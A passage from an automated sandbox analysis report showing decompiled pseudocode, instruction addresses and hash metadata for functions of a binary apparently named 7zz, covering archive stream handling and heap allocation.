						L0042EAEC(_t127);
						L0042EB2E();
						L0042EB83(_t127);
						E0040C9B4(_t101 + 0x6c,  *((intOrPtr*)(_t134 + 0xc)));
						E00407A18( *((intOrPtr*)(_t134 - 0x24)));
						 *(_t134 - 4) = 3;
						L0042B501(_t134 - 0x74, __eflags);
						_t79 =  *((intOrPtr*)(_t134 - 0x14));
						 *(_t134 - 4) = 2;
						__eflags = _t79;
						if(_t79 != 0) {
							 *((intOrPtr*)( *_t79 + 8))(_t79);
						}
						_t80 =  *((intOrPtr*)(_t134 + 0x14));
						 *(_t134 - 4) = 1;
						__eflags = _t80;
						if(__eflags != 0) {
							 *((intOrPtr*)( *_t80 + 8))(_t80);
						}
						 *(_t134 - 4) =  *(_t134 - 4) & 0x00000000;
						E00430B45(_t101, __eflags);
						_t82 = 0;
					} else {
						E00407A18( *((intOrPtr*)(_t134 - 0x24)));
						 *(_t134 - 4) = 3;
						L0042B501(_t134 - 0x74, __eflags);
						_t87 =  *((intOrPtr*)(_t134 - 0x14));
						 *(_t134 - 4) = 2;
						__eflags = _t87;
						if(_t87 != 0) {
							 *((intOrPtr*)( *_t87 + 8))(_t87);
						}
						_t88 =  *((intOrPtr*)(_t134 + 0x14));
						 *(_t134 - 4) = 1;
						__eflags = _t88;
						if(_t88 != 0) {
							 *((intOrPtr*)( *_t88 + 8))(_t88);
						}
						_t82 = _t132;
					}
				} else {
					 *(_t134 - 4) = 3;
					L0042B501(_t134 - 0x74, _t141);
					_t92 =  *((intOrPtr*)(_t134 - 0x14));
					 *(_t134 - 4) = 2;
					if(_t92 != 0) {
						 *((intOrPtr*)( *_t92 + 8))(_t92);
					}
					 *(_t134 - 4) = 1;
					if(_t130 != 0) {
						 *((intOrPtr*)( *_t130 + 8))(_t130);
					}
					_t82 =  *((intOrPtr*)(_t134 + 0x10));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t134 - 0xc));
				return _t82;
			}



















                                                                                                                                    0x0042b33d
                                                                                                                                    0x0042b346
                                                                                                                                    0x0042b34d
                                                                                                                                    0x0042b353
                                                                                                                                    0x0042b356
                                                                                                                                    0x0042b35f
                                                                                                                                    0x0042b364
                                                                                                                                    0x0042b367
                                                                                                                                    0x0042b36d
                                                                                                                                    0x0042b370
                                                                                                                                    0x0042b375
                                                                                                                                    0x0042b375
                                                                                                                                    0x0042b378
                                                                                                                                    0x0042b37b
                                                                                                                                    0x0042b37d
                                                                                                                                    0x0042b381
                                                                                                                                    0x0042b38f
                                                                                                                                    0x0042b38f
                                                                                                                                    0x0042b391
                                                                                                                                    0x0042b397
                                                                                                                                    0x0042b39b
                                                                                                                                    0x0042b3a0
                                                                                                                                    0x0042b3a7
                                                                                                                                    0x0042b3ad
                                                                                                                                    0x0042b3b4
                                                                                                                                    0x0042b3b9
                                                                                                                                    0x0042b3bb
                                                                                                                                    0x0042b3be
                                                                                                                                    0x0042b3f3
                                                                                                                                    0x0042b405
                                                                                                                                    0x0042b408
                                                                                                                                    0x0042b40b
                                                                                                                                    0x0042b40e
                                                                                                                                    0x0042b413
                                                                                                                                    0x0042b414
                                                                                                                                    0x0042b417
                                                                                                                                    0x0042b41d
                                                                                                                                    0x0042b421
                                                                                                                                    0x0042b422
                                                                                                                                    0x0042b427
                                                                                                                                    0x0042b429
                                                                                                                                    0x0042b42b
                                                                                                                                    0x0042b46d
                                                                                                                                    0x0042b474
                                                                                                                                    0x0042b47b
                                                                                                                                    0x0042b486
                                                                                                                                    0x0042b48e
                                                                                                                                    0x0042b494
                                                                                                                                    0x0042b49b
                                                                                                                                    0x0042b4a0
                                                                                                                                    0x0042b4a3
                                                                                                                                    0x0042b4a7
                                                                                                                                    0x0042b4a9
                                                                                                                                    0x0042b4ae
                                                                                                                                    0x0042b4ae
                                                                                                                                    0x0042b4b1
                                                                                                                                    0x0042b4b4
                                                                                                                                    0x0042b4b8
                                                                                                                                    0x0042b4ba
                                                                                                                                    0x0042b4bf
                                                                                                                                    0x0042b4bf
                                                                                                                                    0x0042b4c2
                                                                                                                                    0x0042b4c8
                                                                                                                                    0x0042b4cd
                                                                                                                                    0x0042b42d
                                                                                                                                    0x0042b430
                                                                                                                                    0x0042b436
                                                                                                                                    0x0042b43d
                                                                                                                                    0x0042b442
                                                                                                                                    0x0042b445
                                                                                                                                    0x0042b449
                                                                                                                                    0x0042b44b
                                                                                                                                    0x0042b450
                                                                                                                                    0x0042b450
                                                                                                                                    0x0042b453
                                                                                                                                    0x0042b456
                                                                                                                                    0x0042b45a
                                                                                                                                    0x0042b45c
                                                                                                                                    0x0042b461
                                                                                                                                    0x0042b461
                                                                                                                                    0x0042b464
                                                                                                                                    0x0042b464
                                                                                                                                    0x0042b3c0
                                                                                                                                    0x0042b3c3
                                                                                                                                    0x0042b3c7
                                                                                                                                    0x0042b3cc
                                                                                                                                    0x0042b3cf
                                                                                                                                    0x0042b3d5
                                                                                                                                    0x0042b3da
                                                                                                                                    0x0042b3da
                                                                                                                                    0x0042b3df
                                                                                                                                    0x0042b3e3
                                                                                                                                    0x0042b3e8
                                                                                                                                    0x0042b3e8
                                                                                                                                    0x0042b3eb
                                                                                                                                    0x0042b3eb
                                                                                                                                    0x0042b4f5
                                                                                                                                    0x0042b4fe

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 0042B33D
                                                                                                                                      • Part of subcall function 0042F024: __EH_prolog.LIBCMT ref: 0042F029
                                                                                                                                      • Part of subcall function 0042B501: __EH_prolog.LIBCMT ref: 0042B506
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: cdbfe49c50f0ef098f8cc0fed68cf8632f5982a1bffcf80b3caf0fe23c254c9c
                                                                                                                                    • Instruction ID: 5cb2430fb4dc953f393a3ee5c8d9f9ed3e7e4da21bbd91b41222667785b49699
                                                                                                                                    • Opcode Fuzzy Hash: cdbfe49c50f0ef098f8cc0fed68cf8632f5982a1bffcf80b3caf0fe23c254c9c
                                                                                                                                    • Instruction Fuzzy Hash: 8551A130A00258DFCF11EFA5D9846EEBBB4EF54308F24409EE805A7352CB789E41DB65
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00412DB2 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                    			E00412DB2(void* __ecx) {
				intOrPtr _t70;
				intOrPtr* _t71;
				void* _t72;
				intOrPtr* _t75;
				intOrPtr* _t76;
				intOrPtr _t79;
				intOrPtr* _t84;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t101;
				intOrPtr _t103;
				intOrPtr* _t112;
				intOrPtr* _t115;
				intOrPtr* _t118;
				intOrPtr _t120;
				void* _t121;
				intOrPtr _t123;

				L0046B890(E00474574, _t121);
				_push(__ecx);
				 *((intOrPtr*)(_t121 - 0x10)) = _t123;
				 *((intOrPtr*)(_t121 - 4)) = 0;
				if( *((intOrPtr*)(_t121 + 0xc)) < 0 ||  *((intOrPtr*)(_t121 + 0xc)) > 3) {
					_t70 =  *((intOrPtr*)(_t121 + 8));
					_t118 = _t70 + 0x98;
					_t71 =  *((intOrPtr*)(_t70 + 0x98));
					__eflags = _t71;
					if(_t71 != 0) {
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						 *_t118 = 0;
					}
					_t72 = 0x80004005;
					goto L36;
				} else {
					_t120 =  *((intOrPtr*)(_t121 + 8));
					if( *((intOrPtr*)(_t120 + 0xa0)) != 0) {
						_t87 =  *((intOrPtr*)(_t120 + 0x9c));
						 *((intOrPtr*)(_t120 + 0xf0)) =  *((intOrPtr*)(_t120 + 0xf0)) +  !( *(_t87 + 0x18));
						 *((intOrPtr*)(_t120 + 0x88)) =  *((intOrPtr*)(_t87 + 0x10));
						 *((intOrPtr*)(_t120 + 0x8c)) =  *((intOrPtr*)(_t87 + 0x14));
						 *((char*)(_t120 + 0x90)) = 1;
						_t89 =  *((intOrPtr*)(_t120 + 0xa0));
						if(_t89 != 0) {
							 *((intOrPtr*)( *_t89 + 8))(_t89);
							 *((intOrPtr*)(_t120 + 0xa0)) = 0;
						}
					}
					if( *((intOrPtr*)(_t120 + 0x98)) == 0) {
						L24:
						_t115 = _t120 + 0x90;
						if( *((intOrPtr*)(_t120 + 0x90)) != 0) {
							L26:
							 *((intOrPtr*)(_t120 + 0xe8)) =  *((intOrPtr*)(_t120 + 0xe8)) +  *((intOrPtr*)(_t120 + 0x88));
							asm("adc [eax+0x4], edx");
							L27:
							_t75 = _t120 + 0xd8;
							if( *((intOrPtr*)(_t120 + 0x80)) == 0) {
								_t75 = _t120 + 0xe0;
							}
							 *_t75 =  *_t75 + 1;
							asm("adc [eax+0x4], ebx");
							if( *((intOrPtr*)(_t120 + 0x59)) != 0 &&  *((intOrPtr*)(_t120 + 0x7f)) != 0) {
								E00409A29( *((intOrPtr*)(_t120 + 0x38)),  *((intOrPtr*)(_t120 + 0x78))); // executed
							}
							_t76 =  *((intOrPtr*)(_t120 + 0x18));
							_t72 =  *((intOrPtr*)( *_t76 + 0x20))(_t76,  *((intOrPtr*)(_t121 + 0xc)),  *((intOrPtr*)(_t120 + 0x5d)));
							L36:
							 *[fs:0x0] =  *((intOrPtr*)(_t121 - 0xc));
							return _t72;
						}
						E00411FA9(_t120);
						if( *_t115 == 0) {
							goto L27;
						}
						goto L26;
					}
					if( *((intOrPtr*)(_t120 + 0x5c)) == 0 ||  *((intOrPtr*)(_t120 + 0x7e)) == 0) {
						_t79 =  *((intOrPtr*)(_t120 + 0x10));
						__eflags =  *((intOrPtr*)(_t79 + 0x2c));
						if(__eflags == 0) {
							 *((intOrPtr*)(_t121 + 8)) = 0;
							goto L13;
						}
						_t86 = _t79 + 0x24;
						goto L9;
					} else {
						_t86 = _t120 + 0x70;
						L9:
						 *((intOrPtr*)(_t121 + 8)) = _t86;
						L13:
						if( *((intOrPtr*)(_t120 + 0x5b)) == 0 ||  *((intOrPtr*)(_t120 + 0x7d)) == 0) {
							_t112 = 0;
							__eflags = 0;
						} else {
							_t112 = _t120 + 0x68;
						}
						if( *((intOrPtr*)(_t120 + 0x5a)) == 0) {
							L20:
							_t101 = 0;
							__eflags = 0;
							goto L21;
						} else {
							_t135 =  *((intOrPtr*)(_t120 + 0x7c));
							if( *((intOrPtr*)(_t120 + 0x7c)) == 0) {
								goto L20;
							}
							_t101 = _t120 + 0x60;
							L21:
							E0040BD82( *((intOrPtr*)(_t120 + 0x94)) + 8, _t101, _t112,  *((intOrPtr*)(_t121 + 8)));
							_t103 =  *((intOrPtr*)(_t120 + 0x94));
							 *((intOrPtr*)(_t120 + 0x88)) =  *((intOrPtr*)(_t103 + 0x18));
							 *((intOrPtr*)(_t120 + 0x8c)) =  *((intOrPtr*)(_t103 + 0x1c));
							 *((char*)(_t120 + 0x90)) = 1;
							_t72 = E0040D3F3(_t103, _t135);
							if(_t72 != 0) {
								goto L36;
							}
							_t84 =  *((intOrPtr*)(_t120 + 0x98));
							if(_t84 != 0) {
								 *((intOrPtr*)( *_t84 + 8))(_t84);
								 *((intOrPtr*)(_t120 + 0x98)) = 0;
							}
							goto L24;
						}
					}
				}
			}





















                                                                                                                                    0x00412db7
                                                                                                                                    0x00412dbc
                                                                                                                                    0x00412dc5
                                                                                                                                    0x00412dc8
                                                                                                                                    0x00412dcb
                                                                                                                                    0x00412f42
                                                                                                                                    0x00412f45
                                                                                                                                    0x00412f4b
                                                                                                                                    0x00412f51
                                                                                                                                    0x00412f53
                                                                                                                                    0x00412f58
                                                                                                                                    0x00412f5b
                                                                                                                                    0x00412f5b
                                                                                                                                    0x00412f5d
                                                                                                                                    0x00000000
                                                                                                                                    0x00412ddb
                                                                                                                                    0x00412ddb
                                                                                                                                    0x00412de4
                                                                                                                                    0x00412de6
                                                                                                                                    0x00412df1
                                                                                                                                    0x00412dfd
                                                                                                                                    0x00412e03
                                                                                                                                    0x00412e09
                                                                                                                                    0x00412e10
                                                                                                                                    0x00412e18
                                                                                                                                    0x00412e1d
                                                                                                                                    0x00412e20
                                                                                                                                    0x00412e20
                                                                                                                                    0x00412e18
                                                                                                                                    0x00412e2c
                                                                                                                                    0x00412ecd
                                                                                                                                    0x00412ed3
                                                                                                                                    0x00412ed9
                                                                                                                                    0x00412ee6
                                                                                                                                    0x00412ef2
                                                                                                                                    0x00412efe
                                                                                                                                    0x00412f01
                                                                                                                                    0x00412f07
                                                                                                                                    0x00412f0d
                                                                                                                                    0x00412f0f
                                                                                                                                    0x00412f0f
                                                                                                                                    0x00412f15
                                                                                                                                    0x00412f18
                                                                                                                                    0x00412f1e
                                                                                                                                    0x00412f2b
                                                                                                                                    0x00412f2b
                                                                                                                                    0x00412f33
                                                                                                                                    0x00412f3d
                                                                                                                                    0x00412f62
                                                                                                                                    0x00412f67
                                                                                                                                    0x00412f70
                                                                                                                                    0x00412f70
                                                                                                                                    0x00412edd
                                                                                                                                    0x00412ee4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00412ee4
                                                                                                                                    0x00412e35
                                                                                                                                    0x00412e44
                                                                                                                                    0x00412e47
                                                                                                                                    0x00412e4a
                                                                                                                                    0x00412e51
                                                                                                                                    0x00000000
                                                                                                                                    0x00412e51
                                                                                                                                    0x00412e4c
                                                                                                                                    0x00000000
                                                                                                                                    0x00412e3c
                                                                                                                                    0x00412e3c
                                                                                                                                    0x00412e3f
                                                                                                                                    0x00412e3f
                                                                                                                                    0x00412e54
                                                                                                                                    0x00412e57
                                                                                                                                    0x00412e63
                                                                                                                                    0x00412e63
                                                                                                                                    0x00412e5e
                                                                                                                                    0x00412e5e
                                                                                                                                    0x00412e5e
                                                                                                                                    0x00412e68
                                                                                                                                    0x00412e74
                                                                                                                                    0x00412e74
                                                                                                                                    0x00412e74
                                                                                                                                    0x00000000
                                                                                                                                    0x00412e6a
                                                                                                                                    0x00412e6a
                                                                                                                                    0x00412e6d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00412e6f
                                                                                                                                    0x00412e76
                                                                                                                                    0x00412e8a
                                                                                                                                    0x00412e8f
                                                                                                                                    0x00412e94
                                                                                                                                    0x00412e9d
                                                                                                                                    0x00412ea3
                                                                                                                                    0x00412eaa
                                                                                                                                    0x00412eb1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00412eb7
                                                                                                                                    0x00412ebf
                                                                                                                                    0x00412ec4
                                                                                                                                    0x00412ec7
                                                                                                                                    0x00412ec7
                                                                                                                                    0x00000000
                                                                                                                                    0x00412ebf
                                                                                                                                    0x00412e68
                                                                                                                                    0x00412e35

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: a6921194d0c3b171961f7e2d0d4fab16f42526df81de7e47b1bf747543ff3b15
                                                                                                                                    • Instruction ID: 07fe3d3cc5dbb80cfcc1b2f20c161f072f6c6ff10f75d1b6cf221e6a487779e4
                                                                                                                                    • Opcode Fuzzy Hash: a6921194d0c3b171961f7e2d0d4fab16f42526df81de7e47b1bf747543ff3b15
                                                                                                                                    • Instruction Fuzzy Hash: CC513775600B80DFD725CF24C590BA7BBE1BB45304F08886EE49ACB312D775A99ADB14
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0042A0B8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0042A0B8(void* __ecx) {
				intOrPtr _t59;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr _t64;
				intOrPtr* _t66;
				intOrPtr _t68;
				intOrPtr* _t69;
				intOrPtr _t70;
				intOrPtr* _t72;
				intOrPtr _t83;
				signed int _t97;
				void* _t100;
				intOrPtr* _t101;
				intOrPtr _t102;
				void* _t104;

				L0046B890(0x476e40, _t104);
				_t100 = __ecx;
				_t59 =  *((intOrPtr*)(__ecx + 0x28));
				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x18)) + 0xc)) + _t59)) == 0) {
					 *(_t104 - 0x10) = 2;
				} else {
					 *(_t104 - 0x10) = 0 |  *((intOrPtr*)(__ecx + 0x2c)) != 0x00000000;
				}
				 *((intOrPtr*)(_t104 - 0x14)) = 0;
				_t97 =  *((intOrPtr*)(_t100 + 0x24)) + _t59;
				_t60 =  *((intOrPtr*)(_t100 + 0x1c));
				 *(_t104 - 4) = 0;
				_t61 =  *((intOrPtr*)( *_t60 + 0x14))(_t60,  *((intOrPtr*)(_t100 + 0x20)) + _t97, _t104 - 0x14,  *(_t104 - 0x10));
				 *((intOrPtr*)(_t104 - 0x18)) = _t61;
				if(_t61 == 0) {
					E0040C9B4( *((intOrPtr*)(_t100 + 0xc)) + 8,  *((intOrPtr*)(_t104 - 0x14)));
					_t64 =  *((intOrPtr*)(_t100 + 0xc));
					 *(_t64 + 0x18) =  *(_t64 + 0x18) | 0xffffffff;
					 *((intOrPtr*)(_t64 + 0x10)) = 0;
					 *((intOrPtr*)(_t64 + 0x14)) = 0;
					 *((char*)(_t64 + 0x1c)) =  *((intOrPtr*)(_t100 + 0x2d));
					_t83 =  *((intOrPtr*)(_t100 + 0x14));
					 *((char*)(_t100 + 0x2e)) = 1;
					_t66 =  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x70)) + _t97 * 4));
					 *((intOrPtr*)(_t100 + 0x30)) =  *_t66;
					 *((intOrPtr*)(_t100 + 0x34)) =  *((intOrPtr*)(_t66 + 4));
					if( *(_t104 - 0x10) == 0 &&  *((intOrPtr*)(_t104 - 0x14)) == 0 && (_t97 >=  *((intOrPtr*)(_t83 + 0x120)) ||  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x124)) + _t97)) == 0) &&  *((intOrPtr*)(_t66 + 0x1d)) == 0) {
						 *(_t104 - 0x10) = 2;
					}
					_t101 =  *((intOrPtr*)(_t100 + 0x1c));
					_t68 =  *((intOrPtr*)( *_t101 + 0x18))(_t101,  *(_t104 - 0x10));
					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
					_t102 = _t68;
					_t69 =  *((intOrPtr*)(_t104 - 0x14));
					if(_t69 != 0) {
						 *((intOrPtr*)( *_t69 + 8))(_t69);
					}
					_t70 = _t102;
				} else {
					_t72 =  *((intOrPtr*)(_t104 - 0x14));
					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
					if(_t72 != 0) {
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t70 =  *((intOrPtr*)(_t104 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t104 - 0xc));
				return _t70;
			}


















                                                                                                                                    0x0042a0bd
                                                                                                                                    0x0042a0c7
                                                                                                                                    0x0042a0cf
                                                                                                                                    0x0042a0d8
                                                                                                                                    0x0042a0e7
                                                                                                                                    0x0042a0da
                                                                                                                                    0x0042a0e2
                                                                                                                                    0x0042a0e2
                                                                                                                                    0x0042a0ee
                                                                                                                                    0x0042a0fa
                                                                                                                                    0x0042a0fc
                                                                                                                                    0x0042a103
                                                                                                                                    0x0042a10c
                                                                                                                                    0x0042a111
                                                                                                                                    0x0042a114
                                                                                                                                    0x0042a138
                                                                                                                                    0x0042a13d
                                                                                                                                    0x0042a143
                                                                                                                                    0x0042a147
                                                                                                                                    0x0042a14a
                                                                                                                                    0x0042a14d
                                                                                                                                    0x0042a150
                                                                                                                                    0x0042a153
                                                                                                                                    0x0042a15d
                                                                                                                                    0x0042a162
                                                                                                                                    0x0042a168
                                                                                                                                    0x0042a16b
                                                                                                                                    0x0042a18a
                                                                                                                                    0x0042a18a
                                                                                                                                    0x0042a191
                                                                                                                                    0x0042a19a
                                                                                                                                    0x0042a19d
                                                                                                                                    0x0042a1a1
                                                                                                                                    0x0042a1a3
                                                                                                                                    0x0042a1a8
                                                                                                                                    0x0042a1ad
                                                                                                                                    0x0042a1ad
                                                                                                                                    0x0042a1b0
                                                                                                                                    0x0042a116
                                                                                                                                    0x0042a116
                                                                                                                                    0x0042a119
                                                                                                                                    0x0042a11f
                                                                                                                                    0x0042a124
                                                                                                                                    0x0042a124
                                                                                                                                    0x0042a127
                                                                                                                                    0x0042a127
                                                                                                                                    0x0042a1b8
                                                                                                                                    0x0042a1c0

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: 7ab009d1e2ed9e899f1d54d1a58fb1ea226361b7bb4d783b5357aba12f66f38d
                                                                                                                                    • Instruction ID: 543cb986228c99d3567dbcd824bb6bb0964835257bbb1fe3b9b9a9f66e7197fe
                                                                                                                                    • Opcode Fuzzy Hash: 7ab009d1e2ed9e899f1d54d1a58fb1ea226361b7bb4d783b5357aba12f66f38d
                                                                                                                                    • Instruction Fuzzy Hash: B541BC70A00256CFCB24CF58D48486ABBF2FF48324B248AAED4969B351C730ED56CF91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0046C003 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 24%
                                                                                                                                    			E0046C003(unsigned int _a4) {
				signed int _v8;
				intOrPtr _v20;
				void* _v32;
				intOrPtr _t19;
				void* _t20;
				signed char _t22;
				void* _t23;
				void* _t24;
				void* _t36;
				unsigned int _t44;
				unsigned int _t46;
				intOrPtr _t47;
				void* _t50;

				_push(0xffffffff);
				_push(0x47c848);
				_push(E0046CE74);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_t19 =  *0x496584; // 0x1
				if(_t19 != 3) {
					__eflags = _t19 - 2;
					if(_t19 != 2) {
						goto L11;
					} else {
						_t24 = _a4;
						__eflags = _t24;
						if(_t24 == 0) {
							_t44 = 0x10;
						} else {
							_t9 = _t24 + 0xf; // 0xf
							_t44 = _t9 & 0xfffffff0;
						}
						_a4 = _t44;
						__eflags = _t44 -  *0x49015c; // 0x1e0
						if(__eflags > 0) {
							L10:
							_push(_t44);
							goto L14;
						} else {
							E0046E56A(9);
							_pop(_t36);
							_v8 = 1;
							_v32 = L0046F902(_t36, _t44 >> 4);
							_v8 = _v8 | 0xffffffff;
							E0046C0C9();
							_t23 = _v32;
							__eflags = _t23;
							if(_t23 == 0) {
								goto L10;
							}
						}
					}
				} else {
					_t46 = _a4;
					_t50 = _t46 -  *0x49657c; // 0x0
					if(_t50 > 0) {
						L11:
						_t20 = _a4;
						__eflags = _t20;
						if(_t20 == 0) {
							_t20 = 1;
						}
						_t22 = _t20 + 0x0000000f & 0x000000f0;
						__eflags = _t22;
						_push(_t22);
						L14:
						_push(0);
						_t23 = RtlAllocateHeap( *0x496580); // executed
					} else {
						E0046E56A(9);
						_v8 = _v8 & 0x00000000;
						_push(_t46);
						_v32 = L0046EE5F();
						_v8 = _v8 | 0xffffffff;
						E0046C06A();
						_t23 = _v32;
						if(_t23 == 0) {
							goto L11;
						} else {
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t23;
			}
















                                                                                                                                    0x0046c006
                                                                                                                                    0x0046c008
                                                                                                                                    0x0046c00d
                                                                                                                                    0x0046c018
                                                                                                                                    0x0046c019
                                                                                                                                    0x0046c026
                                                                                                                                    0x0046c02e
                                                                                                                                    0x0046c073
                                                                                                                                    0x0046c076
                                                                                                                                    0x00000000
                                                                                                                                    0x0046c078
                                                                                                                                    0x0046c078
                                                                                                                                    0x0046c07b
                                                                                                                                    0x0046c07d
                                                                                                                                    0x0046c089
                                                                                                                                    0x0046c07f
                                                                                                                                    0x0046c07f
                                                                                                                                    0x0046c082
                                                                                                                                    0x0046c082
                                                                                                                                    0x0046c08a
                                                                                                                                    0x0046c08d
                                                                                                                                    0x0046c093
                                                                                                                                    0x0046c0c3
                                                                                                                                    0x0046c0c3
                                                                                                                                    0x00000000
                                                                                                                                    0x0046c095
                                                                                                                                    0x0046c097
                                                                                                                                    0x0046c09c
                                                                                                                                    0x0046c09d
                                                                                                                                    0x0046c0b0
                                                                                                                                    0x0046c0b3
                                                                                                                                    0x0046c0b7
                                                                                                                                    0x0046c0bc
                                                                                                                                    0x0046c0bf
                                                                                                                                    0x0046c0c1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046c0c1
                                                                                                                                    0x0046c093
                                                                                                                                    0x0046c030
                                                                                                                                    0x0046c030
                                                                                                                                    0x0046c033
                                                                                                                                    0x0046c039
                                                                                                                                    0x0046c0d2
                                                                                                                                    0x0046c0d2
                                                                                                                                    0x0046c0d5
                                                                                                                                    0x0046c0d7
                                                                                                                                    0x0046c0db
                                                                                                                                    0x0046c0db
                                                                                                                                    0x0046c0df
                                                                                                                                    0x0046c0df
                                                                                                                                    0x0046c0e1
                                                                                                                                    0x0046c0e2
                                                                                                                                    0x0046c0e2
                                                                                                                                    0x0046c0ea
                                                                                                                                    0x0046c03f
                                                                                                                                    0x0046c041
                                                                                                                                    0x0046c047
                                                                                                                                    0x0046c04b
                                                                                                                                    0x0046c052
                                                                                                                                    0x0046c055
                                                                                                                                    0x0046c059
                                                                                                                                    0x0046c05e
                                                                                                                                    0x0046c063
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0046c065
                                                                                                                                    0x0046c063
                                                                                                                                    0x0046c039
                                                                                                                                    0x0046c0f3
                                                                                                                                    0x0046c0fe

                                                                                                                                    APIs
